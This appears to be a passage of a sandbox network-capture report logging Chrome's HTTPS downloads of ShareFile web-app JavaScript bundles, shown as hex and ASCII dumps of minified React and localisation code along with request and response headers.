                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 76 61 6c 69 64 5f 64 69 67 69 74 3a 22 56 65 75 69 6c 6c 65 7a 20 65 6e 74 72 65 72 20 75 6e 20 63 68 69 66 66 72 65 22 2c 65 78 63 65 65 64 5f 6d 61 78 5f 63 68 61 72 73 3a 22 4c 65 20 6d 65 73 73 61 67 65 20 61 20 61 74 74 65 69 6e 74 20 6c 61 20 6c 69 6d 69 74 65 20 64 65 20 63 61 72 61 63 74 c3 a8 72 65 73 2e 20 49 6c 20 65 73 74 20 70 6f 73 73 69 62 6c 65 20 71 75 27 69 6c 20 73 6f 69 74 20 74 72 6f 6e 71 75 c3 a9 22 2c 66 6f 72 6d 61 74 74 65 64 4e 75 6d 62 65 72 46 69 65 6c 64 3a 7b 63 61 6e 6e 6f 74 42 65 42 65 74 77 65 65 6e 45 72 72 6f 72 3a 22 4c 65 20 6e 6f 6d 62 72 65 20 6e 65 20 70 65 75 74 20 70 61 73 20 c3 aa 74 72 65 20 63 6f 6d 70 72 69 73 20 65 6e 74 72 65 20 7b 7b 6d 69 6e 7d 7d 20 65 74 20 7b 7b 6d 61 78 7d 7d 22 2c 63 61 6e 6e 6f 74
                                                                                                                                                                                                                      Data Ascii: valid_digit:"Veuillez entrer un chiffre",exceed_max_chars:"Le message a atteint la limite de caractres. Il est possible qu'il soit tronqu",formattedNumberField:{cannotBeBetweenError:"Le nombre ne peut pas tre compris entre {{min}} et {{max}}",cannot
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 20 64 65 20 65 6d 61 69 6c 22 2c 45 6d 70 74 79 34 30 34 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 c3 a7 c3 a3 6f 20 64 65 20 61 72 71 75 69 76 6f 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 22 2c 45 6d 70 74 79 41 70 70 73 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 c3 a7 c3 a3 6f 20 64 65 20 61 70 6c 69 63 61 74 69 76 6f 22 2c 45 6d 70 74 79 43 6f 6d 6d 65 6e 74 73 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 c3 a7 c3 b5 65 73 20 64 65 20 63 6f 6d 65 6e 74 c3 a1 72 69 6f 22 2c 45 6d 70 74 79 43 6f 6d 70 6c 65 74 65 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 c3 a7 c3 a3 6f 20 64 65 20 74 6f 64 6f 73 20 6f 73 20 69 74 65 6e 73 20 63 6f 6e 63 6c 75 c3 ad 64 6f 73 22 2c 45 6d 70 74 79 43 6f 6d 70 75 74 65 72 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 c3 a7 c3 a3 6f 20 64 65
                                                                                                                                                                                                                      Data Ascii: de email",Empty404Icon:"Ilustrao de arquivo no encontrado",EmptyAppsIcon:"Ilustrao de aplicativo",EmptyCommentsIcon:"Ilustraes de comentrio",EmptyCompleteIcon:"Ilustrao de todos os itens concludos",EmptyComputerIcon:"Ilustrao de
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC15108INData Raw: 3d 22 2e 63 6f 6e 63 61 74 28 65 29 2c 7b 6d 65 74 68 6f 64 3a 22 47 45 54 22 7d 29 2c 74 2e 6e 65 78 74 3d 33 2c 68 28 6e 2c 7b 65 78 70 65 63 74 65 64 53 74 61 74 75 73 3a 32 30 30 2c 64 65 66 61 75 6c 74 45 72 72 6f 72 4d 65 73 73 61 67 65 3a 22 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 64 65 6c 65 74 65 64 20 70 72 6f 6a 65 63 74 73 22 7d 29 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 72 3d 74 2e 73 65 6e 74 2c 74 2e 6e 65 78 74 3d 36 2c 72 2e 74 65 78 74 28 29 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 20 6f 3d 74 2e 73 65 6e 74 2c 74 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 4a 53 4f 4e 2e 70 61 72 73 65 28 6f 2c 6d 29 29 3b 63 61 73 65 20 38 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 74 2e 73 74 6f 70 28 29 7d 7d 29 2c 74 29 7d
                                                                                                                                                                                                                      Data Ascii: =".concat(e),{method:"GET"}),t.next=3,h(n,{expectedStatus:200,defaultErrorMessage:"Unable to get deleted projects"});case 3:return r=t.sent,t.next=6,r.text();case 6:return o=t.sent,t.abrupt("return",JSON.parse(o,m));case 8:case"end":return t.stop()}}),t)}
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC1276INData Raw: 21 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 50 72 65 66 65 72 65 6e 63 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 52 65 63 79 63 6c 65 42 69 6e 44 61 79 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 63 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 22 73 68 61 72 65 66 69 6c 65 3a 61 63 63 6f 75 6e 74 2d 22 2e 63 6f 6e 63 61 74 28 65 2e 49 64 29 7d 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 75 28 65 29 2c 22 2f 75 73 65 72 2d 22 29 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 64 3d 72 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 7b 70 69 6c 65 74 41 70 69 3a 7b 45 78 74 65 6e 73 69 6f 6e 3a 66 75 6e 63 74
                                                                                                                                                                                                                      Data Ascii: !==(n=null===(t=e.Preferences)||void 0===t?void 0:t.RecycleBinDays)&&void 0!==n?n:c}function u(e){return"sharefile:account-".concat(e.Id)}var l=function(e,t){return"".concat(u(e),"/user-").concat(t)},d=r["default"].createContext({piletApi:{Extension:funct


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      105192.168.2.174982713.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC607OUTGET /sharefile-web/sharefiledev-view-engine-pilet/1.24.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 120056
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 00:52:04 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:20 GMT
                                                                                                                                                                                                                      ETag: "33040c25dcd11460d4fcaf829905e8bd"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 2b11d6e7cfac22d5fd2bf9a0df8c4d2a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: oUMfrlBi7Z6wAQGNbPhfjbjE8H42Ve5dAu35hDR4HxGmrbojpNsGvg==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC15794INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 76 69 65 77 65 6e 67 69 6e 65 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevviewenginepilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(o,"__esModule"
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 2e 6c 65 6e 67 74 68 3b 2b 2b 69 29 7b 69 66 28 21 6f 29 72 65 74 75 72 6e 20 75 6e 64 65 66 69 6e 65 64 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6f 5b 72 5b 69 5d 5d 26 26 69 2b 31 3c 72 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 75 6e 64 65 66 69 6e 65 64 3b 69 66 28 6f 5b 72 5b 69 5d 5d 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 66 6f 72 28 76 61 72 20 61 3d 32 2c 73 3d 72 2e 73 6c 69 63 65 28 69 2c 69 2b 61 29 2e 6a 6f 69 6e 28 6e 29 2c 75 3d 6f 5b 73 5d 3b 75 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 72 2e 6c 65 6e 67 74 68 3e 69 2b 61 3b 29 61 2b 2b 2c 75 3d 6f 5b 73 3d 72 2e 73 6c 69 63 65 28 69 2c 69 2b 61 29 2e 6a 6f 69 6e 28 6e 29 5d 3b 69 66 28 75 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 72 65 74 75 72 6e 20 75 6e 64 65 66
                                                                                                                                                                                                                      Data Ascii: .length;++i){if(!o)return undefined;if("string"==typeof o[r[i]]&&i+1<r.length)return undefined;if(o[r[i]]===undefined){for(var a=2,s=r.slice(i,i+a).join(n),u=o[s];u===undefined&&r.length>i+a;)a++,u=o[s=r.slice(i,i+a).join(n)];if(u===undefined)return undef
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 2e 69 6e 64 65 78 4f 66 28 22 2d 22 29 3e 2d 31 3f 28 22 6c 61 6e 67 75 61 67 65 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 69 28 74 68 69 73 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 65 29 29 2c 22 6c 61 6e 67 75 61 67 65 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 22 63 75 72 72 65 6e 74 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 69 28 74 68 69 73 2e 67 65 74 53 63 72 69 70 74 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 65 29 29 2c 22 63 75 72 72 65 6e 74 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 69 28 74 68 69 73 2e 67 65 74 4c
                                                                                                                                                                                                                      Data Ascii: "string"==typeof e&&e.indexOf("-")>-1?("languageOnly"!==this.options.load&&i(this.formatLanguageCode(e)),"languageOnly"!==this.options.load&&"currentOnly"!==this.options.load&&i(this.getScriptPartFromCode(e)),"currentOnly"!==this.options.load&&i(this.getL
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC15698INData Raw: 74 68 69 73 2e 73 74 61 74 65 5b 65 5d 3d 74 3f 2d 31 3a 32 3b 76 61 72 20 61 3d 7b 7d 3b 74 68 69 73 2e 71 75 65 75 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 2c 73 2c 75 2c 6c 2c 63 2c 66 3b 72 3d 6e 2e 6c 6f 61 64 65 64 2c 73 3d 69 2c 6c 3d 45 28 72 2c 5b 6f 5d 2c 4f 62 6a 65 63 74 29 2c 63 3d 6c 2e 6f 62 6a 2c 66 3d 6c 2e 6b 2c 63 5b 66 5d 3d 63 5b 66 5d 7c 7c 5b 5d 2c 75 26 26 28 63 5b 66 5d 3d 63 5b 66 5d 2e 63 6f 6e 63 61 74 28 73 29 29 2c 75 7c 7c 63 5b 66 5d 2e 70 75 73 68 28 73 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 70 65 6e 64 69 6e 67 5b 74 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 64 65 6c 65 74 65 20 65 2e 70 65 6e 64 69 6e 67 5b 74 5d 2c 65 2e 70 65 6e 64 69 6e 67 43 6f 75 6e 74
                                                                                                                                                                                                                      Data Ascii: this.state[e]=t?-1:2;var a={};this.queue.forEach((function(n){var r,s,u,l,c,f;r=n.loaded,s=i,l=E(r,[o],Object),c=l.obj,f=l.k,c[f]=c[f]||[],u&&(c[f]=c[f].concat(s)),u||c[f].push(s),function(e,t){e.pending[t]!==undefined&&(delete e.pending[t],e.pendingCount
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 68 65 2c 6f 3d 64 65 28 64 65 28 64 65 28 7b 7d 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 74 29 2c 7b 69 73 43 6c 6f 6e 65 3a 21 30 7d 29 2c 69 3d 6e 65 77 20 6e 28 6f 29 3b 74 2e 64 65 62 75 67 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 74 2e 70 72 65 66 69 78 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 28 69 2e 6c 6f 67 67 65 72 3d 69 2e 6c 6f
                                                                                                                                                                                                                      Data Ascii: on(){var e=this,t=arguments.length>0&&arguments[0]!==undefined?arguments[0]:{},r=arguments.length>1&&arguments[1]!==undefined?arguments[1]:he,o=de(de(de({},this.options),t),{isClone:!0}),i=new n(o);t.debug===undefined&&t.prefix===undefined||(i.logger=i.lo
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 6c 61 73 73 4e 61 6d 65 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 22 2c 22 76 69 65 77 42 6f 78 22 2c 22 73 70 69 6e 22 2c 22 72 6f 74 61 74 65 22 2c 22 74 61 62 49 6e 64 65 78 22 2c 22 6f 6e 43 6c 69 63 6b 22 2c 22 63 68 69 6c 64 72 65 6e 22 5d 2c 42 3d 72 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 63 6c 61 73 73 4e 61 6d 65 2c 61 3d 65 2e 63 6f 6d 70 6f 6e 65 6e 74 2c 6c 3d 65 2e 76 69 65 77 42 6f 78 2c 66 3d 65 2e 73 70 69 6e 2c 70 3d 65 2e 72 6f 74 61 74 65 2c 64 3d 65 2e 74 61 62 49 6e 64 65 78 2c 68 3d 65 2e 6f 6e 43 6c 69 63 6b 2c 6d 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 79 3d 28 30 2c 75 2e 41 29 28 65 2c 5f 29 2c 62 3d 72 2e 75 73 65 52 65 66 28 29 2c 77 3d 67 28 62 2c 74 29 3b 7a 28 42 6f 6f
                                                                                                                                                                                                                      Data Ascii: lassName","component","viewBox","spin","rotate","tabIndex","onClick","children"],B=r.forwardRef((function(e,t){var n=e.className,a=e.component,l=e.viewBox,f=e.spin,p=e.rotate,d=e.tabIndex,h=e.onClick,m=e.children,y=(0,u.A)(e,_),b=r.useRef(),w=g(b,t);z(Boo
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 6e 20 75 6e 6b 6e 6f 77 6e 20 53 79 73 74 65 6d 4a 53 20 63 6f 6e 74 65 78 74 2e 20 45 78 70 65 63 74 65 64 20 63 6f 6e 74 65 78 74 2e 6d 65 74 61 2e 75 72 6c 2c 20 62 75 74 20 6e 6f 6e 65 20 77 61 73 20 70 72 6f 76 69 64 65 64 22 29 3b 6e 2e 70 3d 72 28 6e 2e 79 2e 6d 65 74 61 2e 75 72 6c 2c 65 29 7d 7d 2c 36 30 33 35 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 6e 2e 68 72 65 66 3d 65 3b 66 6f 72 28 76 61 72 20 72 3d 22 2f 22 3d 3d 3d 6e 2e 70 61 74 68 6e 61 6d 65 5b 30 5d 3f 6e 2e 70 61 74 68 6e 61 6d 65 3a 22 2f 22 2b 6e 2e 70 61 74 68 6e 61 6d 65 2c 6f 3d 30 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 6f 21 3d 3d 74 26
                                                                                                                                                                                                                      Data Ascii: n unknown SystemJS context. Expected context.meta.url, but none was provided");n.p=r(n.y.meta.url,e)}},60358:(e,t,n)=>{function r(e,t){var n=document.createElement("a");n.href=e;for(var r="/"===n.pathname[0]?n.pathname:"/"+n.pathname,o=0,i=r.length;o!==t&
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC6644INData Raw: 77 20 45 72 72 6f 72 28 22 41 75 74 6f 6d 61 74 69 63 20 70 75 62 6c 69 63 50 61 74 68 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 69 6e 20 74 68 69 73 20 62 72 6f 77 73 65 72 22 29 3b 65 3d 65 2e 72 65 70 6c 61 63 65 28 2f 23 2e 2a 24 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 3f 2e 2a 24 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5b 5e 5c 2f 5d 2b 24 2f 2c 22 2f 22 29 2c 64 2e 70 3d 65 7d 29 28 29 2c 28 28 29 3d 3e 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 29 7b 76 61 72 20 65 3d 65 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 28 74 2c 6e 29 3d 3e 7b 76 61 72 20 72 3d 64 2e 6d 69 6e 69 43 73 73 46 28 65 29 2c 6f 3d 64 2e 70 2b 72 3b 69 66 28 28 28 65 2c 74 29 3d 3e 7b 66 6f 72
                                                                                                                                                                                                                      Data Ascii: w Error("Automatic publicPath is not supported in this browser");e=e.replace(/#.*$/,"").replace(/\?.*$/,"").replace(/\/[^\/]+$/,"/"),d.p=e})(),(()=>{if("undefined"!=typeof document){var e=e=>new Promise(((t,n)=>{var r=d.miniCssF(e),o=d.p+r;if(((e,t)=>{for


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      106192.168.2.174982613.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:19 UTC611OUTGET /sharefile-web/sharefiledev-task-aggregator-pilet/1.0.23/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 124348
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 01:04:00 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:20 GMT
                                                                                                                                                                                                                      ETag: "4e4e4fd0b0580ef04c25c9db829e370f"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 4b3bed207ec72204ebc89ae818e573ee.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: XCEpRpaJr-XBCDPsAQoBFUUXwDwHUg7QxvczN6EJQnZ9qAkQ7-gdtg==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 61 73 6b 61 67 67 72 65 67 61 74 6f 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtaskaggregatorpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(i,"__esModule"
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 65 2c 74 29 7d 3b 63 6f 6e 73 74 20 6c 65 3d 75 65 3b 66 75 6e 63 74 69 6f 6e 20 66 65 28 65 2c 74 29 7b 6c 65 28 65 2c 22 5b 40 61 6e 74 2d 64 65 73 69 67 6e 2f 69 63 6f 6e 73 5d 20 22 2e 63 6f 6e 63 61 74 28 74 29 29 7d 76 61 72 20 70 65 3d 7b 77 69 64 74 68 3a 22 31 65 6d 22 2c 68 65 69 67 68 74 3a 22 31 65 6d 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 66 6f 63 75 73 61 62 6c 65 3a 22 66 61 6c 73 65 22 7d 2c 64 65 3d 5b 22 63 6c 61 73 73 4e 61 6d 65 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 22 2c 22 76 69 65 77 42 6f 78 22 2c 22 73 70 69 6e 22 2c 22 72 6f 74 61 74 65 22 2c 22 74 61 62 49 6e 64 65 78 22 2c 22 6f 6e 43 6c 69 63 6b 22 2c 22 63 68 69 6c 64 72 65 6e 22 5d 2c 68
                                                                                                                                                                                                                      Data Ascii: e,t)};const le=ue;function fe(e,t){le(e,"[@ant-design/icons] ".concat(t))}var pe={width:"1em",height:"1em",fill:"currentColor","aria-hidden":"true",focusable:"false"},de=["className","component","viewBox","spin","rotate","tabIndex","onClick","children"],h
                                                                                                                                                                                                                      2024-11-05 19:36:20 UTC16384INData Raw: 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 64 28 74 29 2b 22 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 22 29 7d 72 65 74 75 72 6e 20 77 2e 70 72 6f 74 6f 74 79 70 65 3d 78 2c 6f 28 6a 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 2c 7b 76 61 6c 75 65 3a 78 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 6f 28 78 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 2c 7b 76 61 6c 75 65 3a 77 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 77 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 75 28 78 2c 63 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 2c 74 2e 69 73 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26
                                                                                                                                                                                                                      Data Ascii: w new TypeError(d(t)+" is not iterable")}return w.prototype=x,o(j,"constructor",{value:x,configurable:!0}),o(x,"constructor",{value:w,configurable:!0}),w.displayName=u(x,c,"GeneratorFunction"),t.isGeneratorFunction=function(e){var t="function"==typeof e&&
